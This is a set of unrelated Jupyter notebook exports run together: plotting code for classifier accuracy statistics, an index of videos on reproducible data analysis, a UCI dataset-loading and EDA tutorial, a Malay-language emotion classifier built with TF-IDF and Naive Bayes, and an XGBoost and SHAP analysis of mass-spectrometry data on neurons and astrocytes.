plt.xlabel("Acc (Kappa func. group %)")
plt.subplot(1, 2, 2)
standard_barplot(valid_alleviation(remove_small(db, 5000)), 'allevation_level', 1)
plt.xlabel("Level of alleviation (%)")
plt.text(13, 15.8, 'B)', fontsize = 24)
plt.savefig('cnstats_acc_all.png', dpi=400)
```
### Correlation between accuracy and nbr samples.
```
def accuracy_scatter(db, xfield, yfield, ymult = 1):
for (i, val) in enumerate(target_vals):
db_sub =[(row) for row in db if row.target_nbr_samples_final == val]
yvals = map(lambda x:getattr(x, yfield)*ymult, db_sub)
xvals = map(lambda x:getattr(x, xfield), db_sub)
plt.scatter(xvals, yvals, color=colors[i])
colors = ['blue', 'green', 'red']
target_vals = [2500, 4000, 7500]
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
font = {'size' : 14, 'weight' : 'normal'}
matplotlib.rc('font', **font)
plt.subplot(1, 2, 1)
accuracy_scatter(db, "nsamples_org", "funckappa", ymult= 100)
plt.legend(target_vals)
plt.xscale('log')
plt.xlim([500, 900000])
plt.text(1000, 97, 'A)', fontsize = 24)
plt.ylim([0, 110])
plt.ylabel('Acc. (Kappa func. group %)')
plt.xlabel('Number of samples')
plt.grid('on')
plt.subplot(1, 2, 2)
accuracy_scatter(db, "nlabels", "train_time", ymult = 1.0/3600)
plt.legend(target_vals)
# plt.xscale('log')
# plt.yscale('log')
plt.xlim([0, 120])
plt.ylim([0, 120])
plt.text(20, 105, 'B)', fontsize = 24)
plt.ylabel('Training time (h)')
plt.xlabel('Size of label-set')
plt.grid('on')
plt.savefig('cnstats_scatter.png', dpi=400)
```
#### Correlation size of labelset and accuracy
```
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
plt.subplot(1, 2, 1)
plt.scatter(map(lambda x:x.nlabels, db), map(lambda x:x.fullkappa*100, db))
plt.ylim([0, 100])
plt.ylabel('Acc. (Kappa full %)')
plt.xlabel('Size of labelset')
plt.grid('on')
plt.subplot(1, 2, 2)
plt.scatter(map(lambda x:x.nlabels, db), map(lambda x:x.funckappa*100, db))
plt.ylim([0, 100])
plt.ylabel('Acc. (Kappa func. group %)')
plt.xlabel('Size of labelset')
plt.grid('on')
plt.savefig('cnstats_labelset_scatter.pdf')
db_sub =[(x) for x in db if isinstance(x.allevation_level, (int, np.float32, np.float64))]
pylab.rcParams['figure.figsize'] = (12.0, 5.0)
plt.scatter(map(lambda x:x.nlabels, db_sub), map(lambda x:x.allevation_level, db_sub))
plt.xlabel('n samples')
plt.grid('on')
ns = map(lambda x:x.nsamples_org, db)
np.argmax(ns)
db[2].source_id
np.argmax([None, 'N.A.', 12])
len(remove_small(db, 1000))
```
| github_jupyter |
# Reproducible Data Analysis in Jupyter
*Jake VanderPlas, March 2017*
Jupyter notebooks provide a useful environment for interactive exploration of data. A common question, though, is how you can progress from this nonlinear, interactive, trial-and-error style of analysis to a more linear and reproducible analysis based on organized, well-tested code. This series of videos shows an example of how I approach reproducible data analysis within the Jupyter notebook.
Each video is approximately 5-8 minutes; the videos are
available in a [YouTube Playlist](https://www.youtube.com/playlist?list=PLYCpMb24GpOC704uO9svUrihl-HY1tTJJ).
Alternatively, below you can find the videos with some description and lists of relevant resources
```
# Quick utility to embed the videos below
from IPython.display import YouTubeVideo
def embed_video(index, playlist='PLYCpMb24GpOC704uO9svUrihl-HY1tTJJ'):
return YouTubeVideo('', index=index - 1, list=playlist, width=600, height=350)
```
## Part 1: Loading and Visualizing Data
*In this video, I introduce the dataset, and use the Jupyter notebook to download and visualize it.*
```
embed_video(1)
```
Relevant resources:
- [Fremont Bridge Bike Counter](http://www.seattle.gov/transportation/bikecounter_fremont.htm): the website where you can explore the data
- [A Whirlwind Tour of Python](https://github.com/jakevdp/WhirlwindTourOfPython): my book introducing the Python programming language, aimed at scientists and engineers.
- [Python Data Science Handbook](https://github.com/jakevdp/PythonDataScienceHandbook): my book introducing Python's data science tools, including an introduction to the IPython, Pandas, and Matplotlib tools used here.
## Part 2: Further Data Exploration
*In this video, I do some slightly more sophisticated visualization with the data, using matplotlib and pandas.*
```
embed_video(2)
```
Relevant Resources:
- [Pivot Tables Section](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/03.09-Pivot-Tables.ipynb) from the Python Data Science Handbook
## Part 3: Version Control with Git & GitHub
*In this video, I set up a repository on GitHub and commit the notebook into version control.*
```
embed_video(3)
```
Relevant Resources:
- [Version Control With Git](https://swcarpentry.github.io/git-novice/): excellent novice-level tutorial from Software Carpentry
- [Github Guides](https://guides.github.com/): set of tutorials on using GitHub
- [The Whys and Hows of Licensing Scientific Code](http://www.astrobetter.com/blog/2014/03/10/the-whys-and-hows-of-licensing-scientific-code/): my 2014 blog post on AstroBetter
## Part 4: Working with Data and GitHub
*In this video, I refactor the data download script so that it only downloads the data when needed*
```
embed_video(4)
```
## Part 5: Creating a Python Package
*In this video, I move the data download utility into its own separate package*
```
embed_video(5)
```
Relevant Resources:
- [How To Package Your Python Code](https://python-packaging.readthedocs.io/): broad tutorial on Python packaging.
## Part 6: Unit Testing with PyTest
*In this video, I add unit tests for the data download utility*
```
embed_video(6)
```
Relevant resources:
- [Pytest Documentation](http://doc.pytest.org/)
- [Getting Started with Pytest](https://jacobian.org/writing/getting-started-with-pytest/): a nice tutorial by Jacob Kaplan-Moss
## Part 7: Refactoring for Speed
*In this video, I refactor the data download function to be a bit faster*
```
embed_video(7)
```
Relevant Resources:
- [Python ``strftime`` reference](http://strftime.org/)
- [Pandas Datetime Section](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/03.11-Working-with-Time-Series.ipynb) from the Python Data Science Handbook
## Part 8: Debugging a Broken Function
*In this video, I discover that my refactoring has caused a bug. I debug it and fix it.*
```
embed_video(8)
```
## Part 8.5: Finding and Fixing a scikit-learn bug
*In this video, I discover a bug in the scikit-learn codebase, and go through the process of submitting a GitHub Pull Request fixing the bug*
```
embed_video(9)
```
## Part 9: Further Data Exploration: PCA and GMM
*In this video, I apply unsupervised learning techniques to the data to explore what we can learn from it*
```
embed_video(10)
```
Relevant Resources:
- [Principal Component Analysis In-Depth](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/05.09-Principal-Component-Analysis.ipynb) from the Python Data Science Handbook
- [Gaussian Mixture Models In-Depth](https://github.com/jakevdp/PythonDataScienceHandbook/blob/master/notebooks/05.12-Gaussian-Mixtures.ipynb) from the Python Data Science Handbook
## Part 10: Cleaning-up the Notebook
*In this video, I clean-up the unsupervised learning analysis to make it more reproducible and presentable.*
```
embed_video(11)
```
Relevant Resources:
- [Learning Seattle's Work Habits from Bicycle Counts](https://jakevdp.github.io/blog/2015/07/23/learning-seattles-work-habits-from-bicycle-counts/): My 2015 blog post using Fremont Bridge data
| github_jupyter |
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
import pandas_profiling as pp
%matplotlib inline
```
# Load The Data from UCI Machine Learning Repository in CSV
The UCI Machine Learning Repository is a collection of databases, domain theories, and data generators that are used by the machine learning community for the empirical analysis of machine learning algorithms.[UCI Machine Learning](https://archive.ics.uci.edu/ml/index.php)
## Data Set Colletion For UCI
* `Step-1`: Goto this [link](https://archive.ics.uci.edu/ml/datasets.php)
* `Step-2`: Select the Data Sets
* `Step-3`: Copy the Data Url 
* `Step-4`: Copy the Attribute Information:
## Usage
```Python
import numpy as np
import pandas as pd
URL = "https://archive.ics.uci.edu/ml/machine-learning-databases/adult/adult.data"
Col_Names = ['age','workclass','fnlwgt','education','education-num','marital-status','occupation','relationship','race','sex','capital-loss','hours-per-week','native-country','Income']
Data = pd.read_csv(URL,header=None)
Data.columns = Names
Data
```
## Contributing
If any one Intrested work with Use Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
Please make sure to update tests as appropriate.
## License
[MIT](https://choosealicense.com/licenses/mit/)[Copyright (c) 2020 REDDY PRASAD]
```
URL = "https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data"
Data = pd.read_csv(URL,header=None)
Data
Col = ['Sepal_Length','Sepal_Width','Petal_Length','Petal_Width','class']
Data.columns= Col
Data
Data.head() # first Five Rows
Data.tail() # last Five rows
Data.info() # Complite Info About the Data
Data.describe().T
Data.columns
Data.values
```
Exploratory Data Analysis refers to the critical process of performing ... and try to catch hold of as many insights from the data set using EDA.
```
sns.pairplot(Data) # check the relationship b/w Each Col
sns.pairplot(Data, kind='reg')
```
1. **0** -- No Relationship
2. **1** -- Strong Correlated
3. **-1** -- Negative Correlated
```
plt.figure(figsize=(30,15))
sns.heatmap(Data.corr())
plt.boxplot(Data.Sepal_Length)
plt.boxplot(Data.Sepal_Width)
plt.boxplot(Data.Petal_Length)
fig, axes = plt.subplots(nrows=2, ncols=2,figsize=(30,15)) # create 2x2 array of subplots
Data.boxplot(column='Petal_Length',by='class', ax=axes[0,0]) # add boxplot to 1st subplot
Data.boxplot(column='Petal_Width', by='class', ax=axes[0,1]) # add boxplot to 2nd subplot
Data.boxplot(column='Sepal_Width', by='class', ax=axes[1,0])
Data.boxplot(column='Sepal_Length', by='class', ax=axes[1,1])
# etc.
plt.show()
```
## Load The Data From Github
1. **Step-1:** Go to any Github Url and [Data Set](https://github.com/reddyprasade/Machine-Learning-Problems-DataSets)
2. **Step-2:** Select the Data [Data Selection](https://github.com/reddyprasade/Machine-Learning-Problems-DataSets/blob/master/Regression/Automobile%20price%20data%20_Raw_.csv)
3. **Step-2:** Click On Raw Data

```
Automobile = pd.read_csv('https://raw.githubusercontent.com/reddyprasade/Machine-Learning-Problems-DataSets/master/Regression/Automobile%20price%20data%20_Raw_.csv')
Automobile
```
| github_jupyter |
```
import re
import numpy as np
import pandas as pd
import collections
from sklearn import metrics
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from unidecode import unidecode
from nltk.util import ngrams
from tqdm import tqdm
import time
permulaan = [
'bel',
'se',
'ter',
'men',
'meng',
'mem',
'memper',
'di',
'pe',
'me',
'ke',
'ber',
'pen',
'per',
]
hujung = ['kan', 'kah', 'lah', 'tah', 'nya', 'an', 'wan', 'wati', 'ita']
def naive_stemmer(word):
assert isinstance(word, str), 'input must be a string'
hujung_result = re.findall(r'^(.*?)(%s)$' % ('|'.join(hujung)), word)
word = hujung_result[0][0] if len(hujung_result) else word
permulaan_result = re.findall(r'^(.*?)(%s)' % ('|'.join(permulaan[::-1])), word)
permulaan_result.extend(re.findall(r'^(.*?)(%s)' % ('|'.join(permulaan)), word))
mula = permulaan_result if len(permulaan_result) else ''
if len(mula):
mula = mula[1][1] if len(mula[1][1]) > len(mula[0][1]) else mula[0][1]
return word.replace(mula, '')
def classification_textcleaning(string):
string = re.sub(
'http\S+|www.\S+',
'',
' '.join(
[i for i in string.split() if i.find('#') < 0 and i.find('@') < 0]
),
)
string = unidecode(string).replace('.', ' . ').replace(',', ' , ')
string = re.sub('[^A-Za-z ]+', ' ', string)
string = re.sub(r'[ ]+', ' ', string).strip()
string = ' '.join(
[i for i in re.findall('[\\w\']+|[;:\-\(\)&.,!?"]', string) if len(i)]
)
string = string.lower().split()
string = [(naive_stemmer(word), word) for word in string]
return (
' '.join([word[0] for word in string if len(word[0]) > 1]),
' '.join([word[1] for word in string if len(word[0]) > 1]),
)
import os
emotion_files = [f for f in os.listdir(os.getcwd()) if 'translated-' in f]
emotion_files
texts, labels = [], []
for f in emotion_files:
with open(f) as fopen:
dataset = list(filter(None, fopen.read().split('\n')))
labels.extend([f.split('-')[1]] * len(dataset))
texts.extend(dataset)
for i in range(len(texts)):
texts[i] = classification_textcleaning(texts[i])[0]
unique_labels = np.unique(labels).tolist()
labels = LabelEncoder().fit_transform(labels)
unique_labels
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
tfidf = TfidfVectorizer(ngram_range=(1, 3),min_df=2).fit(texts)
delattr(tfidf, 'stop_words_')
vectors = tfidf.transform(texts)
vectors.shape
train_X, test_X, train_Y, test_Y = train_test_split(vectors, labels, test_size = 0.2)
multinomial = MultinomialNB().fit(train_X, train_Y)
print(
metrics.classification_report(
train_Y,
multinomial.predict(train_X),
target_names = unique_labels,
)
)
multinomial = MultinomialNB().fit(train_X, train_Y)
print(
metrics.classification_report(
test_Y,
multinomial.predict(test_X),
target_names = unique_labels,
)
)
text = 'kerajaan sebenarnya sangat bencikan rakyatnya, minyak naik dan segalanya'
multinomial.predict_proba(tfidf.transform([classification_textcleaning(text)[0]]))
import pickle
with open('multinomial-emotion.pkl','wb') as fopen:
pickle.dump(multinomial,fopen)
with open('tfidf-multinomial-emotion.pkl','wb') as fopen:
pickle.dump(tfidf,fopen)
```
| github_jupyter |
```
import analysis
import test_features
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib
from matplotlib.pyplot import subplots,scatter
import matplotlib.patches as mpatches
import seaborn as sns
from sklearn.externals import joblib
from sklearn.cluster import KMeans
from sklearn.metrics import adjusted_rand_score, adjusted_mutual_info_score
import scipy.stats as stats
from sklearn.cluster import AgglomerativeClustering
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.model_selection import cross_val_score
#from yellowbrick.features import RFECV
from sklearn.feature_selection import RFECV
from sklearn.svm import SVC
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KNeighborsClassifier
from sklearn.decomposition import PCA
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
import xgboost
data_info = pd.read_csv('data_info.csv',index_col=0).T
batch = pd.read_csv('ICC_batch.csv',header=None)
data_info['type'] = data_info['type'].map({'0':'Astrocytes','1':'Neurons'})
data_info['batch'] = batch.values
data_info['batch'] = data_info['batch'].map({0:'batch 1',1:'batch 2'})
data_tic_pp = pd.read_csv('../../sweedler_lab/Data/intensity_tic_pp2.csv',index_col=0)
data_tic_pp_imp = pd.read_csv('../../sweedler_lab/Data/intensity_tic_imp_pp.csv',index_col=0)
data_tic_pp = data_tic_pp.fillna(0)
features = np.asarray([format(float(x),'.2f') for x in data_tic_pp.columns.values]).astype(float)
data_tic_pp.columns = features
data_tic_pp.shape
norm_factors = np.sqrt(np.mean(data_tic_pp.replace(0,np.NaN)**2,axis=1)).values
norm_factors = norm_factors.reshape(data_tic_pp.shape[0],1)
data_tic_pp = np.divide(data_tic_pp,norm_factors)
# norm_factors = np.linalg.norm(data_tic_pp,ord=2,axis=1)
# data_tic_pp = data_tic_pp/norm_factors.reshape(data_tic_pp.shape[0],1)
types = []
batches = []
for sampleid in data_tic_pp.index.values:
types.append(data_info[data_info['sampleID']==sampleid]['type'].values[0])
batches.append(data_info[data_info['sampleID']==sampleid]['batch'].values[0])
#types = np.asarray(types)
types = np.asarray(types)
batches = np.asarray(batches)
data_tic_pp['type'] = types
data_tic_pp.to_pickle('ICC.pkl')
data_rms_pp = pd.read_pickle('ICC_rms.pkl')
data_l2_pp = pd.read_pickle('ICC_L2.pkl')
data_tic_pp = pd.read_pickle('ICC.pkl')
pca_result = analysis.PCanalysis(5,4,data_tic_pp.drop('type',1),False)
pca_df = pd.DataFrame(pca_result)
pca_df['type'] = types
pca_df['batch'] = batches
fig,axes = subplots(1,1,figsize=(5,4))
g=sns.scatterplot(x=0,y=1,hue='type',style='batch',data=pca_df,ax=axes,s=20)
g.legend(loc='upper right')
g.get_xaxis().set_ticks([])
g.get_yaxis().set_ticks([])
plt.xlabel('PC1')
plt.ylabel('PC2')
fig.savefig('plot/pca_ICC.svg')
O,F,P=analysis.rank_sum_test(data_rms_pp.drop('type',1)[types=='Neurons'].values,
data_rms_pp.drop('type',1)[types=='Astrocytes'].values,features,1000)
plt.hist(P,bins=30)
rf_model = RandomForestClassifier(n_estimators=500)
X_train_tic, X_test_tic, y_train, y_test = train_test_split(data_tic_pp.drop('type',1).values, types, test_size=0.2,random_state=19)
X_train_rms, X_test_rms, y_train, y_test = train_test_split(data_rms_pp.drop('type',1).values, types, test_size=0.2,random_state=19)
X_train_l2, X_test_l2, y_train, y_test = train_test_split(data_l2_pp.drop('type',1).values, types, test_size=0.2,random_state=19)
X_train_batch, X_test_batch, y_train_batch, y_test_batch = train_test_split(data_tic_pp.values, batches, test_size=0.2,random_state=19)
xgb_tic = joblib.load('xgb_best.sav')
xgb_rms = joblib.load('xgb_best.sav')
xgb_l2 = joblib.load('xgb_best.sav')
xgb_tic.fit(X_train_tic,y_train)
xgb_rms.fit(X_train_rms,y_train)
xgb_l2.fit(X_train_l2,y_train)
y_pred_xgb_tic = xgb_tic.predict(X_test_tic)
y_pred_xgb_rms = xgb_rms.predict(X_test_rms)
y_pred_xgb_l2 = xgb_l2.predict(X_test_l2)
y_pred_xgb_prob_tic = xgb_tic.predict_proba(X_test_tic)
y_pred_xgb_prob_rms = xgb_rms.predict_proba(X_test_rms)
y_pred_xgb_prob_l2 = xgb_l2.predict_proba(X_test_l2)
report_dict_xgb_best = classification_report(y_test, y_pred_xgb_best, output_dict=True)
report_dict_xgb_best
def plot_featureImp_glob(model,features,feature_num_shown):
feature_imp = model.feature_importances_
# feature_imp_index_ranked = np.argsort(feature_imp)[::-1]
# features_ranked = features[feature_imp_index_ranked]
feature_imp = feature_imp/feature_imp.max()
fig,ax = subplots(figsize=(6,4))
ax.stem(features,feature_imp,markerfmt=' ')
features_selected = []
for i in range(feature_num_shown):
ax.scatter(float(features_ranked[i]),feature_imp[feature_imp_index_ranked][i],color='k',s=10)
ax.annotate(format(float(features_ranked[i]),'.4f'), xy=(float(features_ranked[i]),feature_imp[feature_imp_index_ranked][i]),fontsize=8)
features_selected.append(float(features_ranked[i]))
ax.set_ylabel('relative importance')
ax.set_xlabel('m/z')
return fig, features_selected
# _,features_selected = plot_featureImp_glob(rf_model,features,40)
# _,features_selected2 = plot_featureImp_glob(xgb_model,features,40)
_,features_selected3 = plot_featureImp_glob(xgb_best,features,0)
fig,axes = subplots(1,2,figsize=(18,4))
ax = axes.ravel()
ax[0].hist(y_pred_xgb_prob_best[y_test=='Astrocytes'][:,0],bins=20)
ax[0].set_title('astrocytes',fontsize=15)
ax[1].hist(y_pred_xgb_prob_best[y_test=='Neurons'][:,1],bins=20)
ax[1].set_title('neurons',fontsize=15)
ax[0].set_ylabel('number of cells',fontsize=15)
ax[1].set_ylabel('number of cells',fontsize=15)
ax[0].set_xlabel('predicted probability',fontsize=15)
ax[1].set_xlabel('predicted probability',fontsize=15)
ax[0].axvline(0.5,linestyle='-.',c='r',label='binary classification threshold')
ax[1].axvline(0.5,linestyle='-.',c='r',label='binary classification threshold')
ax[0].legend(fontsize=11,)
ax[1].legend(fontsize=11)
import shap
from adjustText import adjust_text
def feature_contrib(model,X,features,feature_num_shown,if_summary):
shap_explainer = shap.TreeExplainer(model)
shap_vals = shap_explainer.shap_values(X)
fig1,axes = subplots(figsize=(12,4))
g=axes.stem([float(x) for x in features],shap_vals.mean(axis=0),markerfmt=' ',linefmt='k')
axes.get_yaxis().set_ticks([])
shap_vals_index_ranked = np.argsort(shap_vals.mean(axis=0))[::-1]
shap_vals_ranked = shap_vals.mean(axis=0)[shap_vals_index_ranked]
#axes.spines['right'].set_visible(False)
#axes.spines['top'].set_visible(False)
texts = []
axes.scatter(features[shap_vals_index_ranked[:feature_num_shown]],shap_vals_ranked[:feature_num_shown],color='b',s=35,marker='v',label='Neurons')
axes.scatter(features[shap_vals_index_ranked[-feature_num_shown:]],shap_vals_ranked[-feature_num_shown:],color='orange',s=35,marker='s',label='Astrocytes')
#for i in range(feature_num_shown):
#texts.append(plt.text(float(features[shap_vals_index_ranked[i]]),shap_vals_ranked[i],float(features[shap_vals_index_ranked[i]]),fontsize=12))
#texts.append(plt.text(float(features[shap_vals_index_ranked[-i-1]]),shap_vals_ranked[-i-1],float(features[shap_vals_index_ranked[-i-1]]),fontsize=12))
# axes.annotate(format(float(features[shap_vals_index_ranked[i]]),'.2f'), xy=(float(features[shap_vals_index_ranked[i]]),shap_vals_ranked[i]),fontsize=10)
# axes.annotate(format(float(features[shap_vals_index_ranked[-i-1]]),'.2f'), xy=(float(features[shap_vals_index_ranked[-i-1]]),shap_vals_ranked[-i]),fontsize=10)
axes.set_xlabel('m/z',fontsize=12)
axes.set_ylabel('mean SHAP values',fontsize=12)
axes.legend()
#adjust_text(texts)
if if_summary:
fig2,axes = subplots(figsize=(12,4))
shap.summary_plot(shap_vals,X,max_display=15)
return fig1,fig2,shap_vals
fig1,fig2,contrib_xgb_tic = feature_contrib(xgb_tic,data_tic_pp.drop('type',1),data_tic_pp.drop('type',1).columns,10,True)
fig1,fig2,contrib_xgb_rms = feature_contrib(xgb_rms,data_rms_pp.drop('type',1),features,10,True)
fig1,fig2,contrib_xgb_l2 = feature_contrib(xgb_l2,data_l2_pp.drop('type',1),features,10,True)
fig,axes = subplots(2,3,figsize=(15,8))
plt.subplots_adjust(left = 0.125,right = 0.9,bottom = 0.1 ,top = 0.9,wspace = 0.4,hspace = 0.4)
ax = axes.ravel()
ax[0].scatter(contrib_xgb_tic.mean(0),contrib_xgb_rms.mean(0))
ax[0].set_title('spearson correlation= {}'.format(round(scipy.stats.spearmanr(contrib_xgb_tic.mean(0),contrib_xgb_rms.mean(0))[0],3)))
ax[0].set_xlabel('mean SHAP, TIC normalization')
ax[0].set_ylabel('mean SHAP, RMS normalization')
ax[1].scatter(contrib_xgb_l2.mean(0),contrib_xgb_rms.mean(0))
ax[1].set_title('spearson correlation= {}'.format(round(scipy.stats.spearmanr(contrib_xgb_l2.mean(0),contrib_xgb_rms.mean(0))[0],3)))
ax[1].set_xlabel('mean SHAP, L2 normalization')
ax[1].set_ylabel('mean SHAP, RMS normalization')
ax[2].scatter(contrib_xgb_tic.mean(0),contrib_xgb_l2.mean(0))
ax[2].set_title('spearson correlation= {}'.format(round(scipy.stats.spearmanr(contrib_xgb_tic.mean(0),contrib_xgb_l2.mean(0))[0],3)))
ax[2].set_xlabel('mean SHAP, TIC normalization')
ax[2].set_ylabel('mean SHAP, L2 normalization')
ax[3].scatter(xgb_tic.feature_importances_,xgb_rms.feature_importances_)
ax[3].set_xlim(left=0)
ax[3].set_ylim(bottom=0)
ax[3].set_title('spearson correlation= {}'.format(round(scipy.stats.spearmanr(xgb_tic.feature_importances_,xgb_rms.feature_importances_)[0],3)))
ax[3].set_xlabel('Gini importance, TIC normalization')
ax[3].set_ylabel('Gini importance, RMS normalization')
ax[4].scatter(xgb_l2.feature_importances_,xgb_rms.feature_importances_)
ax[4].set_xlim(left=0)
ax[4].set_ylim(bottom=0)
ax[4].set_title('spearson correlation= {}'.format(round(scipy.stats.spearmanr(xgb_l2.feature_importances_,xgb_rms.feature_importances_)[0],3)))
ax[4].set_xlabel('Gini importance, L2 normalization')
ax[4].set_ylabel('Gini importance, RMS normalization')
ax[5].scatter(xgb_tic.feature_importances_,xgb_l2.feature_importances_)
ax[5].set_xlim(left=0)
ax[5].set_ylim(bottom=0)
ax[5].set_title('spearson correlation= {}'.format(round(scipy.stats.spearmanr(xgb_tic.feature_importances_,xgb_l2.feature_importances_)[0],3)))
ax[5].set_xlabel('Gini importance, TIC normalization')
ax[5].set_ylabel('Gini importance, L2 normalization')
fig1.savefig('plot/contribution_plot_ICC_2.svg')
#fig2.savefig('plot/shap_plot_ICC.svg')
shap_ranked_index = np.argsort(abs(contrib_xgb_rms.mean(0)))[::-1]
gini_ranked_index = np.argsort(abs(xgb_rms.feature_importances_))[::-1]
rst_ranked_index = np.argsort(-P)[::-1]
shared_shap_gini = set(shap_ranked_index[:60]).intersection(set(gini_ranked_index[:60]))
shared_shap_rst = set(shap_ranked_index[:60]).intersection(set(rst_ranked_index[:60]))
shared_gini_rst = set(gini_ranked_index[:60]).intersection(set(rst_ranked_index[:60]))
shared_all = set(gini_ranked_index[:60]).intersection(set(rst_ranked_index[:60])).intersection(set(shap_ranked_index[:60]))
print(len(shared_shap_gini),len(shared_shap_rst),len(shared_gini_rst),len(shared_all))
common_feature = features[list(shared_all)]
common_feature = common_feature[np.argsort(common_feature)]
common_feature
import matplotlib
from matplotlib.colors import LinearSegmentedColormap
from matplotlib.ticker import MaxNLocator
def shap_clustering(shap_vals,groups):
shap_pca50 = PCA(n_components=12).fit_transform(shap_vals)
#shap_embedded = TSNE(n_components=2, perplexity=25).fit_transform(shap_vals)
cdict1 = {
'red': ((0.0, 0.11764705882352941, 0.11764705882352941),
(1.0, 0.9607843137254902, 0.9607843137254902)),
'green': ((0.0, 0.5333333333333333, 0.5333333333333333),
(1.0, 0.15294117647058825, 0.15294117647058825)),
'blue': ((0.0, 0.8980392156862745, 0.8980392156862745),
(1.0, 0.3411764705882353, 0.3411764705882353)),
'alpha': ((0.0, 1, 1),
(0.5, 1, 1),
(1.0, 1, 1))
} # #1E88E5 -> #ff0052
red_blue_solid = LinearSegmentedColormap('RedBlue', cdict1)
shap_embedded_df = pd.DataFrame(shap_pca50)
shap_embedded_df['type'] = groups
f1,axes= subplots(1,1,figsize=(5,4))
g = sns.scatterplot(x=0,y=1,hue='type',data=shap_embedded_df,ax=axes)
g.legend(loc='upper right')
axes.spines['right'].set_visible(False)
axes.spines['top'].set_visible(False)
axes.get_yaxis().set_ticks([])
axes.get_xaxis().set_ticks([])
axes.set_xlabel('PC1',fontsize=12)
axes.set_ylabel('PC2',fontsize=12)
f2,axes= subplots(1,1,figsize=(6,4))
plt.scatter(shap_pca50[:,0],
shap_pca50[:,1],
c=shap_vals.sum(1).astype(np.float64),
linewidth=0, alpha=0.9, cmap=red_blue_solid)
cb = plt.colorbar(label="Log odds of being astrocytes or neurons", aspect=40, orientation="vertical")
cb.set_alpha(1)
cb.draw_all()
cb.outline.set_linewidth(0)
cb.ax.tick_params('x', length=0)
cb.ax.xaxis.set_ticks_position("top")
cb.ax.xaxis.set_label_position('bottom')
axes.spines['right'].set_visible(False)
axes.spines['top'].set_visible(False)
axes.get_yaxis().set_ticks([])
axes.get_xaxis().set_ticks([])
axes.set_xlabel('PC1',fontsize=12)
axes.set_ylabel('PC2',fontsize=12)
plt.show()
return f1,f2,shap_pca50
f1,f2,shap_pca_df = shap_clustering(contrib_xgb_rms,types)
f1.savefig('plot/pca_SHAP_ICC.svg')
f2.savefig('plot/pca_SHAP_prob_ICC.svg')
def plot_shap_features(shap_vals,X,FOI):
shap_pca = PCA(n_components=12).fit_transform(shap_vals)
cdict1 = {
'red': ((0.0, 0.11764705882352941, 0.11764705882352941),
(1.0, 0.9607843137254902, 0.9607843137254902)),
'green': ((0.0, 0.5333333333333333, 0.5333333333333333),
(1.0, 0.15294117647058825, 0.15294117647058825)),
'blue': ((0.0, 0.8980392156862745, 0.8980392156862745),
(1.0, 0.3411764705882353, 0.3411764705882353)),
'alpha': ((0.0, 1, 1),
(0.5, 1, 1),
(1.0, 1, 1))
} # #1E88E5 -> #ff0052
red_blue_solid = LinearSegmentedColormap('RedBlue', cdict1)
row_plot = int(np.ceil(len(FOI)/3))
f,axes = subplots(3,row_plot,figsize=(row_plot*5,10))
ax = axes.ravel()
index = 0
for feature in FOI:
fig=ax[index].scatter(shap_pca[:,0],
shap_pca[:,1],
c=X[feature].values[:10000].astype(np.float64),
linewidth=0, alpha=0.75, cmap=red_blue_solid)
cb=plt.colorbar(fig, aspect=40, orientation="vertical",ax=ax[index])
cb.set_alpha(1)
cb.set_label(label='normalized intensity',size=12)
cb.draw_all()
cb.outline.set_linewidth(0)
cb.ax.tick_params('x', length=0)
cb.ax.xaxis.set_label_position('top')
ax[index].set_title(format(float(feature),'.2f')+' m/z',fontsize=15)
ax[index].axis("off")
index += 1
return f
f=plot_shap_features(contrib_xgb_best,data_tic_pp,[650.51,676.49,768.59])
f.savefig('plot/SHAP_features_ICC.svg')
from datetime import datetime
from sklearn.model_selection import RandomizedSearchCV, GridSearchCV
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import StratifiedKFold
import warnings
warnings.filterwarnings('ignore')
def timer(start_time=None):
if not start_time:
start_time = datetime.now()
return start_time
elif start_time:
thour, temp_sec = divmod((datetime.now() - start_time).total_seconds(), 3600)
tmin, tsec = divmod(temp_sec, 60)
print('\n Time taken: %i hours %i minutes and %s seconds.' % (thour, tmin, round(tsec, 2)))
# A parameter grid for XGBoost
params = {
'min_child_weight': [1, 5, 10],
'gamma': [0,0.5, 1, 1.5, 2, 5],
'subsample': [0.6, 0.8, 1.0],
'colsample_bytree': [0.6, 0.8, 1.0],
'max_depth': [3, 4, 5, 7,10],
'learning_rate':[0.1,0.05,0.01,0.005],
'reg_alpha':[0,1e-5, 1e-2, 0.1, 1]
}
xgb = xgboost.XGBClassifier(learning_rate=0.02, n_estimators=600, objective='binary:logistic',
silent=True, nthread=1)
folds = 5
param_comb = 5
skf = StratifiedKFold(n_splits=folds, shuffle = True, random_state = 19)
random_search = RandomizedSearchCV(xgb, param_distributions=params, n_iter=param_comb, scoring='roc_auc',
n_jobs=8, cv=skf.split(X_train,y_train), verbose=3, random_state=19 )
# Here we go
start_time = timer(None) # timing starts from this point for "start_time" variable
random_search.fit(X_train, y_train)
timer(start_time) # timing ends here for "start_time" variable
print('\n All results:')
print(random_search.cv_results_)
print('\n Best estimator:')
print(random_search.best_estimator_)
print('\n Best normalized gini score for %d-fold search with %d parameter combinations:' % (folds, param_comb))
print(random_search.best_score_ * 2 - 1)
print('\n Best hyperparameters:')
print(random_search.best_params_)
xgb_best = xgboost.XGBClassifier(learning_rate=0.1, n_estimators=600, objective='binary:logistic',
subsample=1,reg_alpha=0,min_child_weight=5,max_depth=4,gamma=0,colsample_bytree=1)
xgb_best.fit(X_train,y_train)
y_pred_xgb_best = xgb_best.predict(X_test)
y_pred_xgb_prob_best = xgb_best.predict_proba(X_test)
report_dict_xgb_best = classification_report(y_test, y_pred_xgb_best, output_dict=True)
joblib.dump(xgb_best,'xgb_best_2.sav')
